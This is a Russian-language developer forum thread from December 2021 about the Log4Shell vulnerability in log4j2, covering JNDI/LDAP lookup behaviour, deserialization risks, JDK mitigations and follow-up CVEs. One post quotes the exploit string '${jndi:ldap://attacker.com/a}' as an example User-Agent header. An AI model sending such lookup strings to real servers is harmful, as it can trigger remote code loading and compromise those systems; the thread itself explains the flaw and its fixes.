|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Если кто-то ещё продолжает им пользоваться то почитайте, очень интересно https://www.lunasec.io/docs/blog/log4j-zero-day/ ... |
|||
:
Нравится:
Не нравится:
|
|||
10.12.2021, 08:18 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
vimba Если кто-то ещё продолжает им пользоваться то почитайте, очень интересно Некогда им читать, надо бегом выпиливать отовсюду Это не просто дыра, это ВНЕЗАПНО оказалось, что 4-й стены нет. Ждите новостей о очередном взломанном ынтерпрайзе с шифрованием, утечками и вымогательством. ... |
|||
:
Нравится:
Не нравится:
|
|||
10.12.2021, 11:24 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Насколько я могу судить, речь идёт не о log4j, а о log4j2 ... |
|||
:
Нравится:
Не нравится:
|
|||
10.12.2021, 14:19 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
как-то непонятно, кому пришло в голову интерполировать параметры шаблона, хотя совсем недавно чет подобное про hibernate-validator читал - там сообщения об ошибках интерполируют. ... |
|||
:
Нравится:
Не нравится:
|
|||
10.12.2021, 14:29 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Да что это за вообще такой функционал был заложен в Logger? Сходить куда-то в веб и стянуть какой-то исполнимый бинарник? ... |
|||
:
Нравится:
Не нравится:
|
|||
10.12.2021, 17:52 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Если я правильно понял, "нехороший человек" делает запрос на сервер. Этот запрос содержит header, например, UserAgent = "${jndi:ldap://attacker.com/a}" Метод на сервере, который обрабатывает этот запрос, содержит метод логирования, в который в качестве параметра передается значение заголовка (userAgent). А что за магия происходит дальше? Как строка превращается в код? ... |
|||
:
Нравится:
Не нравится:
|
|||
10.12.2021, 21:44 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
faustgreen, вот судя по документации (https://logging.apache.org/log4j/2.x/manual/lookups.html) и FR (https://issues.apache.org/jira/browse/LOG4J2-2109) log4j2 по-умолчанию (уже нет) интерполирует все значения плейсхолдеров в шаблоне, интерполировать оно умеет много чего в том числе из JNDI брать данные (ну типа выглядит полезно: мы хотим в лог писать к примеру имя приложения и при этом саму конфигурацию логгера упаковывать в приложение - вот шаблон настроили, а имя в JNDI прописали, красота), вот в эти лукапы JNDI засунули еще поддержку LDAP, а грабли с LDAP описывали еще в 2015 году: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf - жавский клиент когда сущности из каталога выбирает может какие-то атрибуты превращать в объекты (десериалиовывать) - вот он и RCE. Скриншоты в интернетах демонстрируют, что на определенный пейлоад из сети атакуемого были DNS-запросы, резолвящие LDAP-хост, т.е. это детектирование наличия log4j2 ... |
|||
:
Нравится:
Не нравится:
|
|||
11.12.2021, 03:41 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
crutchmaster Это не просто дыра, это ВНЕЗАПНО оказалось, что 4-й стены нет. Ждите новостей о очередном взломанном ынтерпрайзе с шифрованием, утечками и вымогательством. Не всё так ужасно как кажется на первый взгляд. Кто вовремя обновляет свои JDK тот в безопасности авторBoth of the most popular Java implementations, Oracle JDK and OpenJDK, have shipped with a default setting that should prevent exploitation since 2019; the variable com.sun.jndi.rmi.object.trustURLCodebase is set to false by default, disallowing access to remote resources. This setting can be checked to determine if a system has been vulnerable, and set to false as a workaround to prevent attacks, for instance by logging or printing the return value of: System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase") ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 12:24 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Мне как-то повезло больше использовать Slf4j + Logback. ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 12:26 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
vimba Не всё так ужасно как кажется на первый взгляд. Кто вовремя обновляет свои JDK тот в безопасности да вот не совсем... com.sun.jndi.ldap.object.trustURLCodebase=false запрещает классы непонятно откуда грузить, однако саму по себе десериализацию данных прилетевших из LDAP никак не запрещает ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 13:32 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Андрей Панфилов vimba Не всё так ужасно как кажется на первый взгляд. Кто вовремя обновляет свои JDK тот в безопасности да вот не совсем... com.sun.jndi.ldap.object.trustURLCodebase=false запрещает классы непонятно откуда грузить, однако саму по себе десериализацию данных прилетевших из LDAP никак не запрещает это типо атака через ldap получается? т.е. если есть возможность что записать в ldap то все java приложения у которых есть сетевой доступ к серверу ldap можно потенциально заставить выполнить произвольный код. ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 13:52 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Приходится с горечью констатировать что ни ООП ни песочница не являются гарантией безопасности приложения в понимании vulerability. И ведь контрибутили не новички. Наверное - люди которые хорошо знали старый log4j. Знали его недостатки. Улучшали. Следовали какой-то идее. 15 лет коту под хвост. Про.... все полимеры. ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 13:57 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
mayton Приходится с горечью констатировать что ни ООП ни песочница не являются гарантией безопасности приложения в понимании vulerability. И ведь контрибутили не новички. Наверное - люди которые хорошо знали старый log4j. Знали его недостатки. Улучшали. Следовали какой-то идее. 15 лет коту под хвост. Про.... все полимеры. Это прям проблемка то десерилизация данных в jdk. В jackson прям захаркожены классы исключеные для сериализации и в рекомендации стоит не десериализовать данные из none trustable source, и незвестно чем. ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 14:06 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
lleming это типо атака через ldap получается? т.е. если есть возможность что записать в ldap то все java приложения у которых есть сетевой доступ к серверу ldap можно потенциально заставить выполнить произвольный код. ну я ссылку на презентацию давал, там вот написано: авторIf com.sun.jndi.ldap.object.trustURLCodebase is true - attackers can provide their own classes - else, attackers will be able to use available gadgets in classpath насколько я помню после "выпуска" CVE-2015-6420 был некий вой про то, что библиотека якобы не виновата, а просто нефиг десериализовывать данные непонятно откуда, ну вот, прилетела-таки обратка. ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 14:30 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
В наш век, JSon-ов и всяких AVRO/Protobuf/Kryo стандартная десериализация выглядит странно. Кто ей пользуется в явном виде в проектах? ... |
|||
:
Нравится:
Не нравится:
|
|||
13.12.2021, 17:29 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
vimba Кто вовремя обновляет свои JDK тот в безопасности Пффф. Ынтерпрайз. Обновляет ждк. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.12.2021, 05:57 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Мексики подвезли https://log4jmemes.com/ ... |
|||
:
Нравится:
Не нравится:
|
|||
15.12.2021, 23:46 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
мне больше всех вот этот понравился: сам по себе log forging - это уже косяк: https://cwe.mitre.org/data/definitions/117.html, а тут оно прямо из коробки было ... |
|||
:
Нравится:
Не нравится:
|
|||
16.12.2021, 03:10 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
там кстати выяснили, что предыдущее исправление было так себе : CVE-2021-45046It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 makes a best-effort attempt to restrict JNDI LDAP lookups to localhost by default. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. ... |
|||
:
Нравится:
Не нравится:
|
|||
16.12.2021, 09:03 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Мда... первая пуля прошла навылет. На очереди вторая https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.16.0/ ... |
|||
:
Нравится:
Не нравится:
|
|||
16.12.2021, 16:17 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
теперь всем срочно обновлять LogBack - там тоже "RCE": https://jira.qos.ch/browse/LOGBACK-1591 ... |
|||
:
Нравится:
Не нравится:
|
|||
21.12.2021, 02:25 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Да ну, эт чепуха какая-то. Если кто-то может залезть на сервер и менять там файлы как хочет, так он и само приложение может подменить на другое :) ... |
|||
:
Нравится:
Не нравится:
|
|||
21.12.2021, 02:42 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Stanislav Bashkyrtsev, проблема в том, что подход со стороны людей "занимающихся безопасностью" довольно формальный: есть CVE - значит нужно чтобы было исправлено, причем CVE-2021-42550 - еще не самое что я видел, MITRE заводит и похлеще к примеру: - у чуваков на парсинге инта стэктрейс вываливался, им влепили DoS (падает же) и Information Disclosure (по стэку же можно версию жавы определить!) из-за чего по калькулятору насчитали аж 9 - каким-то типам влепили, что вот если подключиться дебагером, то можно все сломать если переписку читать, то там позиция Ceki довольно странная, в том плане что ему прямо на ходу еще пяток таких же "RCE" придумали, но в целом наверное проще "починить" чем объяснять упоротым что они не правы. Однако тенденция настораживает: в спринге же можно сделать include *.xml - теперь это RCE. ... |
|||
:
Нравится:
Не нравится:
|
|||
21.12.2021, 03:08 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Да, с security зачастую очень сложно общаться - у них слишком много власти, и при этом они зачастую максималисты и им все равно насколько их решения не удобны. Главное ведь безопасны. В OSS мире я не знаю насколько они влиятельны, но в компаниях эт печаль-тоска. Мне очень понравилось как к этому в Project Phoenix относятся. Мол, компания должна зарабатывать деньги, и security вообще-то тоже нужны для этого. А не для того чтоб витать в облаках и гоняться за своими вымышленными единорогами. ... |
|||
:
Нравится:
Не нравится:
|
|||
21.12.2021, 09:37 |
|
Критическая уязвимость log4j
|
|||
---|---|---|---|
#18+
Stanislav Bashkyrtsev, а потом - бац, и на сервере обновлений оказывается вредоносная библиотека или "утекает" пароль доступа к инфраструктуре сотен-тысяч компаний. Или миллионы устройств оказываются доступны для управления "кем угодно". ... |
|||
:
Нравится:
Не нравится:
|
|||
21.12.2021, 10:37 |
|
|
start [/forum/topic.php?fid=59&msg=40120487&tid=2120271]: |
0ms |
get settings: |
16ms |
get forum list: |
14ms |
check forum access: |
5ms |
check topic access: |
5ms |
track hit: |
47ms |
get topic data: |
12ms |
get forum data: |
3ms |
get page messages: |
514ms |
get tp. blocked users: |
1ms |
others: | 364ms |
total: | 981ms |
0 / 0 |